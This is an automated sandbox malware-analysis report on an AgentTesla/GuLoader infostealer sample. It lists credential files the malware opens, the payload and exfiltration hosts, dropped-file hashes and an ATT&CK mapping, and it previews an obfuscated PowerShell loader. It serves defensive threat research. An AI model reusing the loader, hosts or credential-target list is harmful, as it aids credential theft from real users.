Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure.CimCmdlets\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.CimCmdlets.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Queries volume information: C:\Windows\SysWOW64\msiexec.exe VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\Amalgamers.exe

0_2_0040320C

Stealing of Sensitive Information

Yara detected AgentTesla

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 00000006.00000002.2891546582.0000000023F71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: msiexec.exe PID: 600, type: MEMORYSTR

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior

Source: Yara match	File source: 00000006.00000002.2891546582.0000000023F71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: msiexec.exe PID: 600, type: MEMORYSTR

Remote Access Functionality

Yara detected AgentTesla

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 00000006.00000002.2891546582.0000000023F71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: msiexec.exe PID: 600, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	121 Windows Management Instrumentation	1 DLL Side-Loading	1 DLL Side-Loading	1 Software Packing	1 OS Credential Dumping	2 File and Directory Discovery	Remote Services	1 Archive Collected Data	1 Ingress Tool Transfer	1 Exfiltration Over Alternative Protocol	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	2 PowerShell	Boot or Logon Initialization Scripts	1 Access Token Manipulation	1 DLL Side-Loading	LSASS Memory	24 System Information Discovery	Remote Desktop Protocol	1 Data from Local System	11 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	311 Process Injection	1 Masquerading	Security Account Manager	211 Security Software Discovery	SMB/Windows Admin Shares	1 Email Collection	1 Non-Standard Port	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	131 Virtualization/Sandbox Evasion	NTDS	1 Process Discovery	Distributed Component Object Model	1 Clipboard Data	2 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Access Token Manipulation	LSA Secrets	131 Virtualization/Sandbox Evasion	SSH	Keylogging	23 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	311 Process Injection	Cached Domain Credentials	1 Application Window Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
Amalgamers.exe	58%	ReversingLabs	Win32.Trojan.Leonem

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Reglements216\Fessewise\Amalgamers.exe	58%	ReversingLabs	Win32.Trojan.Leonem

Source	Detection	Scanner	Label
http://ftp.carbognin.it	0%	Avira URL Cloud	safe
https://abreo.pl/	0%	Avira URL Cloud	safe
https://abreo.pl//CNDKMREh44.bincq	0%	Avira URL Cloud	safe
https://abreo.pl//CNDKMREh44.bin	0%	Avira URL Cloud	safe
http://abreo.pl//CNDKMREh44.bina	0%	Avira URL Cloud	safe
http://abreo.pl//CNDKMREh44.bin	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
abreo.pl	185.36.171.17	true	false		unknown
ftp.carbognin.it	86.107.36.93	true	true		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://abreo.pl//CNDKMREh44.bin	false	Avira URL Cloud: safe	unknown
http://abreo.pl//CNDKMREh44.bin	false	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://abreo.pl//CNDKMREh44.bina	msiexec.exe, 00000006.00000002.2878965092.000000000855C000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://nsis.sf.net/NSIS_Error	Amalgamers.exe, Amalgamers.exe.1.dr	false		high
http://nsis.sf.net/NSIS_ErrorError	Amalgamers.exe, Amalgamers.exe.1.dr	false		high
https://abreo.pl/	msiexec.exe, 00000006.00000002.2878965092.000000000851A000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	msiexec.exe, 00000006.00000002.2891546582.0000000023F71000.00000004.00000800.00020000.00000000.sdmp	false		high
https://abreo.pl//CNDKMREh44.bincq	msiexec.exe, 00000006.00000002.2878965092.0000000008543000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://ftp.carbognin.it	msiexec.exe, 00000006.00000002.2891546582.0000000023FCC000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2891546582.0000000023F71000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
185.36.171.17	abreo.pl	Poland		57367	ECO-ATMAN-PLECO-ATMAN-PL	false
86.107.36.93	ftp.carbognin.it	Romania		6910	DIALTELECOMRO	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1552876
Start date and time:	2024-11-09 20:45:04 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 5m 7s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	8
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	Amalgamers.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@6/17@2/2
EGA Information:	Successful, ratio: 50%
HCA Information:	Successful, ratio: 97% Number of executed functions: 63 Number of non-executed functions: 30
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target msiexec.exe, PID 600 because it is empty
Not all processes where analyzed, report is missing behavior information
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: Amalgamers.exe

Simulations

Behavior and APIs

Time	Type	Description
14:45:53	API Interceptor	41x Sleep call for process: powershell.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
86.107.36.93	FLITTIGL.EXE.exe	Get hash	malicious	AgentTesla, GuLoader	Browse
	ZAMOWIEN.EXE.exe	Get hash	malicious	AgentTesla, GuLoader	Browse
	Rendeles_110078670008860000002.exe	Get hash	malicious	AgentTesla, DarkTortilla	Browse
	Rendeles_1100786700088673955430.exe	Get hash	malicious	AgentTesla, DarkTortilla	Browse
	wzjEaheCBP.exe	Get hash	malicious	AgentTesla, DarkTortilla	Browse
	4MQ9rTK7AV.exe	Get hash	malicious	AgentTesla, DarkTortilla	Browse
	Doc22378670008869955430311.exe	Get hash	malicious	AgentTesla, DarkTortilla	Browse
	doc222378670008869955430341.exe	Get hash	malicious	AgentTesla, DarkTortilla	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
ftp.carbognin.it	FLITTIGL.EXE.exe	Get hash	malicious	AgentTesla, GuLoader	Browse	86.107.36.93
	ZAMOWIEN.EXE.exe	Get hash	malicious	AgentTesla, GuLoader	Browse	86.107.36.93
	Rendeles_110078670008860000002.exe	Get hash	malicious	AgentTesla, DarkTortilla	Browse	86.107.36.93
	Rendeles_1100786700088673955430.exe	Get hash	malicious	AgentTesla, DarkTortilla	Browse	86.107.36.93
	wzjEaheCBP.exe	Get hash	malicious	AgentTesla, DarkTortilla	Browse	86.107.36.93
	4MQ9rTK7AV.exe	Get hash	malicious	AgentTesla, DarkTortilla	Browse	86.107.36.93
	Doc22378670008869955430311.exe	Get hash	malicious	AgentTesla, DarkTortilla	Browse	86.107.36.93
	doc222378670008869955430341.exe	Get hash	malicious	AgentTesla, DarkTortilla	Browse	86.107.36.93

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
DIALTELECOMRO	#U00c1raj#U00e1nlat k#U00e9r#U00e9s 06.11.2024.cmd	Get hash	malicious	DBatLoader, FormBook	Browse	92.114.2.230
	FLITTIGL.EXE.exe	Get hash	malicious	AgentTesla, GuLoader	Browse	86.107.36.93
	splppc.elf	Get hash	malicious	Unknown	Browse	188.209.98.177
	la.bot.arm.elf	Get hash	malicious	Unknown	Browse	93.114.114.57
	la.bot.arm5.elf	Get hash	malicious	Unknown	Browse	46.102.13.204
	SecuriteInfo.com.Win32.Sector.30.15961.3704.exe	Get hash	malicious	Sality	Browse	89.41.154.115
	n5h5BaL8q0.exe	Get hash	malicious	Sality, XWorm	Browse	89.41.154.115
	PfBjDhHzvV.exe	Get hash	malicious	Metasploit, Sality	Browse	89.41.154.115
	https://beforeitsnews.com/health/2024/10/the-happier-meditation-app-is-offering-free-1-year-access-99-value-3059722.html	Get hash	malicious	Unknown	Browse	89.43.104.93
	https://beforeitsnews.com/health/2024/10/the-happier-meditation-app-is-offering-free-1-year-access-99-value-3059722.html	Get hash	malicious	Unknown	Browse	89.43.104.204
ECO-ATMAN-PLECO-ATMAN-PL	Statement JULY #U007e SEP 2024 USD 19,055.00.exe	Get hash	malicious	AgentTesla	Browse	213.189.52.181
	9zldYT23H2.elf	Get hash	malicious	Mirai, Gafgyt	Browse	31.186.82.2
	RicevutaPagamento_115538206.dat	Get hash	malicious	Unknown	Browse	128.204.223.111
	http://bdvenlineabanven.serv00.net/	Get hash	malicious	Unknown	Browse	85.194.246.69
	http://entrabdvline.serv00.net/	Get hash	malicious	Unknown	Browse	85.194.246.69
	http://entrabdvline.serv00.net/	Get hash	malicious	Unknown	Browse	85.194.246.69
	http://ahksoch.serv00.net/x92gamy6wh/	Get hash	malicious	HTMLPhisher	Browse	128.204.218.63
	http://intesa-it.serv00.net/it/conto/	Get hash	malicious	Unknown	Browse	85.194.246.69
	https://spofity.serv00.net/spotify/auth/login.php	Get hash	malicious	Unknown	Browse	128.204.223.117
	http://www.viundodal.serv00.net/	Get hash	malicious	Unknown	Browse	128.204.218.63

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
37f463bf4616ecd445d4a1937da06e19	zGHItMC5Zc.exe	Get hash	malicious	Stealc	Browse	185.36.171.17
	ozcAR7VO6Y.exe	Get hash	malicious	Stealc	Browse	185.36.171.17
	62ccfDfPfE.exe	Get hash	malicious	Unknown	Browse	185.36.171.17
	62ccfDfPfE.exe	Get hash	malicious	Unknown	Browse	185.36.171.17
	6G1YhrEmQu.exe	Get hash	malicious	CredGrabber, Meduza Stealer	Browse	185.36.171.17
	s-white-82333.js	Get hash	malicious	Unknown	Browse	185.36.171.17
	s-white-82333.js	Get hash	malicious	Unknown	Browse	185.36.171.17
	Anfrage_244384.exe	Get hash	malicious	FormBook, GuLoader	Browse	185.36.171.17
	Anfrage_244384.exe	Get hash	malicious	FormBook, GuLoader	Browse	185.36.171.17
	LkzvfB4VFj.exe	Get hash	malicious	FormBook, GuLoader	Browse	185.36.171.17

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	modified
Size (bytes):	14744
Entropy (8bit):	4.992175361088568
Encrypted:	false
SSDEEP:	384:f1VoGIpN6KQkj2qkjh4iUxehQJKoxOdBMNXp5YYo0ib4J:f1V3IpNBQkj2Ph4iUxehIKoxOdBMNZiA
MD5:	A35685B2B980F4BD3C6FD278EA661412
SHA1:	59633ABADCBA9E0C0A4CD5AAE2DD4C15A3D9D062
SHA-256:	3E3592C4BA81DC975DF395058DAD01105B002B21FC794F9015A6E3810D1BF930
SHA-512:	70D130270CD7DB757958865C8F344872312372523628CB53BADE0D44A9727F9A3D51B18B41FB04C2552BCD18FAD6547B9FD0FA0B016583576A1F0F1A16CB52EC
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	PSMODULECACHE.....$...z..Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script........$...z..T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....

C:\Users\user\AppData\Local\Reglements216\Akhoond106.Iml

Download File

Process:	C:\Users\user\Desktop\Amalgamers.exe
File Type:	ASCII text, with very long lines (3119), with CRLF, LF line terminators
Category:	dropped
Size (bytes):	55332
Entropy (8bit):	5.353645282488102
Encrypted:	false
SSDEEP:	1536:W7TLdGG2daYXupOFS8WkIIUGKoqutVa5q:MTLdGG2daTH7uvaM
MD5:	238316EBDAA46CABC02E1A00873CD9F1
SHA1:	0025BF9056BF6B4D8E7FBA5543D2129E55036E0B
SHA-256:	7E6E82376CB78683193983E6740D285784626A16930BB3FD68F416141EBB152D
SHA-512:	9C0D356CF90DA59F716CF975AA076B5ED5799344746211328BFBBF4D823004A3E9DD37F5E7A3EE9389B51A3F377D9983294068511C7DB593BB143502D313766B
Malicious:	true
Reputation:	low
Preview:	$Undermark=$Dewooling;..<#Stationerede Muta Uforstandighedernes #>..<#Mindelundes Annammede Striktrjer Microelectrode Crockeryware Aggrievedly #>..<#Lagerkapacitets Trodser Mislyde Stedsbiord Aishas #>..<#Lejesoldatens yaourt Anomalogonatous Galeiform kvleris Cocktailrysterne overdragernes #>..<#Lsefelts Precarious Sjlehelgenens Dazed Spdbrnsplejerskes #>..<#Amphibiological Inweaving Mellemleddets Increscence #>...$Turdansene = @'.Whiss.Proe.$Porp VVulcaaLej elBetydlUnderiLavvaeRepub9Go er0Pregh=Lap d$PlantGBrydneHagmajebeltsM.diet,lowteStraarKnigh;Fi,tc.Municf BalluDepasnKopmacBeematPornoiElektoCort,n erma TrifeOAlbahvWoodbe NoncrantihsCallitPeptirSkrmim OvermBogfreDist,d Sp teKrlig Plac(Harqu$ChyliGTaca,rhyp suPercebRef abColone GelprNbbesyBesgs1Insol6Jentj3 Tjen,Inves$Kafi,VAvokar.mposdMurstiDeso gSucceh etsie engedBogbes CovekbrnebrFymataChaptvOver,sVin s)Gaull Fras{Elorg.N nda.Hiero$K nsuR brude obulaFors vPerineTolersm lee Under(Acan L MeteiA,tihv SlansBedkkla phinDybvanDragneB

C:\Users\user\AppData\Local\Reglements216\Fessewise\Amalgamers.exe

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Category:	dropped
Size (bytes):	942432
Entropy (8bit):	7.854546227436502
Encrypted:	false
SSDEEP:	24576:IyG1qpfQfJtOutBz+sTrMEnPaS9Jv8MPtquNs:D8qeRg8BzPMEyS3LPfNs
MD5:	E2A5B947AC8266E79CC0C9FAFF051849
SHA1:	A128AAC0DE4BBF879F7DF28526E6B59A30FB82B1
SHA-256:	B5276A247BE390E58BBB52535B1437F1AAE13CA70930CE885C8AAD870BA01053
SHA-512:	E44B6DC1E3043C5AA4E030180B071C8E6B007672FEACF9A6044A656DE55DB499C9F34C3ED9A1D0553DEDDD6FB1C241226F70348B178326292DFDB281BA6EDDE5
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 58%
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........(...F...F...F......F...G.v.F......F..v...F...@...F.Rich..F.........................PE..L...)..\.................d...\|.......2............@.......................... .......g....@.................................<.......................PX...............................................................................................text....b.......d.................. ..`.rdata..\............h..............@..@.data....U...........\|..............@....ndata...................................rsrc...............................@..@................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Reglements216\Fessewise\Amalgamers.exe:Zone.Identifier

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Reputation:	high, very likely benign file
Preview:	[ZoneTransfer]....ZoneId=0

C:\Users\user\AppData\Local\Reglements216\Fessewise\personalebladets.beh

Download File

Process:	C:\Users\user\Desktop\Amalgamers.exe
File Type:	data
Category:	dropped
Size (bytes):	440690
Entropy (8bit):	1.255581911697702
Encrypted:	false
SSDEEP:	1536:G1N2MtdS2LvejlGHy8HheDep9Au5JxtyhfTby:cN2wddLWgHrBv9FDtGfTby
MD5:	AE5B0E26F9F3A5A2DA1071D81623F492
SHA1:	E6DF996B040001B45BC5DF188A812FFCA228402F
SHA-256:	40905A865B10C2C4A8628EB591026C72569F84DF34595095CEE5687037BCE8C1
SHA-512:	FBF0607DDA3B81358E1E629625AFF263F0246128C5B3EC0665FF3D09AD82C64D4A9CF699E17338710BBAD7F530BF9BB6C025BA1B10B43EAC6BE0F24F61529859
Malicious:	false
Reputation:	low
Preview:	........................................C.......Z..............................................................................................................C.......a..............+..................j.............................................m..............................l.......,............$...........+....................... .............................................................S.a....................&..................................................................................u................................................................................a...........................*.................D......E.................................................M......G.................................................................... .................................................%..................W...H....'..................................@a...........O................................................v.............................................................

C:\Users\user\AppData\Local\Reglements216\Fessewise\springsttten.kha

Download File

Process:	C:\Users\user\Desktop\Amalgamers.exe
File Type:	data
Category:	dropped
Size (bytes):	409561
Entropy (8bit):	1.256529395530017
Encrypted:	false
SSDEEP:	768:RhkK/VMgjc5rBHA53RJq0JhgYHWaQcVEVvbqaS3XDmLVKc3uL3edED7YBjRoAbvd:w6vrrHCXJkW5C4jts0K2y8VzuOvuW
MD5:	C2731713BAF2EDFFFFF7C53C3C61CD53
SHA1:	A6C43F762C7C3167D0B42D5DD6E3B312E16A8308
SHA-256:	36E586A6BF59992B10270BEC66272E881E419BFE28DB677A26209960D34BF17D
SHA-512:	2CB775B85A98A3344CA45003E64C65D001FAF8ACBBB8AADDA19B18305F4D9565B6AA7CAEBCCF5496B6CC4315FC7C99574175F50FF5E220A8FACD939C33B3B4AA
Malicious:	false
Reputation:	low
Preview:	..........................................................................................}.........................v.....................................................................G.....w...............................5.............................................J........................................................K..........................M.........................................................................y.T..........................................$...................t...F...........................................................................X...................................t.............................................................u................................................".................................y..........................................~..................................................................................N..........................\|..........................................J................................................

C:\Users\user\AppData\Local\Reglements216\Fessewise\sutra.txt

Download File

Process:	C:\Users\user\Desktop\Amalgamers.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	432
Entropy (8bit):	4.271166045363327
Encrypted:	false
SSDEEP:	12:mGujq8VseUm/LlyyocSEMXbP0WeWegCQW4YNC1ApmP:juY6d4EKP0/gCQNc8P
MD5:	93830656C8BBC22387F3539DB1AA7892
SHA1:	CA06079A8DCDD33C056B3134DDA7F493C9D5B956
SHA-256:	BFCAF44A84BE23126AF3FB6A20E4803F7821CB3EC1C29A2DB815311640928095
SHA-512:	8AE2D33B2908CA53FC7CCF2FEC0F9A196E5E929B3186A82461D1CAA25314E192075FFDBA869D2B61EC8D747DCB22A8E9B485CB6EFE95C9FBB9C3D145CFBFD263
Malicious:	false
Preview:	svrdlilje gogopigerne irresponsive frigoric,schferhunden uddelighedernes inspirer levodopa fintskaarnes exonerative buspassagerer interrelations bourgeoisies soldados..calamumi parmigiana spoliated sekundovioliner stract inorthography jnedes,vandreaar magnat nauseousness blackbeard skywrite..finansimperierne autodafgps skoleleder noncelestially elefantridder.tjledes nyamwezi yppersteprsteliges mortarise rechain dysphonia teenet,

C:\Users\user\AppData\Local\Reglements216\Restaureringens.aan

Download File

Process:	C:\Users\user\Desktop\Amalgamers.exe
File Type:	data
Category:	dropped
Size (bytes):	336987
Entropy (8bit):	7.666340371530923
Encrypted:	false
SSDEEP:	6144:E6JlraYSCu5Xoyx6DkG2gXz1Q+nNH7BYyEh7Zr5WHS2dOgS:EKcYSLFoyxEkGR9N9Gh7F5WH7M
MD5:	D3A1AD4DCC66A97ED5434CB9AFE43C19
SHA1:	56C027799460524E096C2A14F9B791480C0E052E
SHA-256:	E268FEF1533354A336F10CD2C54B34DD37FA1C7BBEB1BC67BA2EE748F3540775
SHA-512:	1E82862724689E47EF56DF069324BD797A660C67590EDE1057F8603876CA52E8AF1C4F215390E2B108BFDA39833C6E79DD5D80D2EFF9F7BAB8B7B9F1444147C6
Malicious:	false
Preview:	............^............GGGGG......11...............G....y......B....................LL......;......y..........L.{....d...yy.....................e.......Z......u...G.......\......v.....9..........7..................G.rr..............999.......##........=...................................~~~.....xxx....VV..&&&...................0..................e.....................M....................7...................ii............................(...........................................E......................3................................c...x............dddd.~....gg.......qq..ppp.;;;;;;........i..5.......1.ff.......................;;......0........S............................T.................b.......U...........X.^^............p....;;;;.............................k.....wwwwww.+.vv........==.........).......W..oo...................ZZ.P...........................-......LL......................kk...........999..2...................eee.......&....=.^....dd...............................

C:\Users\user\AppData\Local\Reglements216\beefaloes.pop

Download File

Process:	C:\Users\user\Desktop\Amalgamers.exe
File Type:	data
Category:	dropped
Size (bytes):	241978
Entropy (8bit):	1.246588775581002
